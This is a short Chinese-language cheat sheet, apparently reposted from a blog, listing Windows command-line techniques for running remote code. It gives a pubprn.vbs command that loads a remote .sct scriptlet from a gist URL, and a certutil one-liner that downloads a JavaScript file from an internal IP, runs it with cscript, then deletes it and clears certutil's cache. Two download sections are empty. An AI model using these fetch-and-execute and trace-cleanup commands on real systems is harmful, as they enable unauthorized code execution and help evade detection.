远程执行sct的另一种姿势
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
detail:https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd
命令行下载姿势1
1 2 3 |
|
命令行下载姿势2
1 |
|
清除缓存 certutil -urlcache -split -f http://192.168.254.102:80/a.txt delete
命令行执行远程JS
certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js && del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete
原文地址:https://www.cnblogs.com/nul1/p/8973337.html